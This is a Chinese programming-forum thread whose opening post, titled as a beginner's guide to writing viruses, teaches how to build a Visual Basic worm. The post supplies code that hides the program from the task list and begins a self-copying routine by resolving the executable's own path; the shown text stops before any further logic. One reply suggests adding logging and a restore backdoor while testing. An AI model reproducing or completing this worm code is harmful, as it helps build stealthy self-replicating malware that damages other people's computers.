| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 2190 人关注过本帖
标题:VB病毒编写------初学者必备
只看楼主 加入收藏
JYF789JKL
Rank: 1
等 级:新手上路
帖 子:2
专家分:0
注 册:2019-7-5
收藏
 问题点数:0 回复次数:2 
VB病毒编写------初学者必备
要编写一个蠕虫吗?很简单,只须有基本的编程概念就可以了。如果你没有编程的基本概念,我建议你去学习编程,才读这篇文章。我就在这里教你如何编写一个VB蠕虫吧!
打开Visual Basic,选择“Standard EXE”的Project。移除那个Form,然后加入一个Module。点击Project->Project1 Properties。在弹出来的窗口中,把Startup Object改为“Sub Main”。在Module中,键入以下的编码:

Sub Main()
'TaskVisible的功能是把程序在End Task表中除掉。
App.TaskVisible = False
End Sub

以上的编码只是把程序从End Task表中除掉,没什么作用。现在,让这个VB蠕虫自行复制去别的文件夹。在Sub Main中键入以下的编码:

'阻止问题发生
On Error Resume Next
Dim Location, Location2, DesLocation, DesLocation2
'得到EXE的位置
Location = App.Path & "\" & App.EXEName & ".exe"
Location2 = App.Path & App.EXEName & ".exe"
搜索更多相关主题的帖子: VB 编写 EXE Sub App 
2019-07-17 15:34
WatchChen
Rank: 1
等 级:新手上路
帖 子:1
专家分:0
注 册:2019-8-18
收藏
得分:0 
哈哈,学了也不知道干啥用系列

依依木林花下月....
2019-08-18 09:27
kingyzbz
Rank: 2
等 级:论坛游民
威 望:1
帖 子:3
专家分:20
注 册:2016-5-19
收藏
得分:0 
好歹你加个跟踪程序 或者日志。才能检测运行状态。测试成功再去掉监测也好,最好加个还原的后门,不然你拿刀砍人 先把自己砍了,关键还不能医好自己 就尴尬了。
2019-09-17 13:08
快速回复:VB病毒编写------初学者必备
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.016940 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved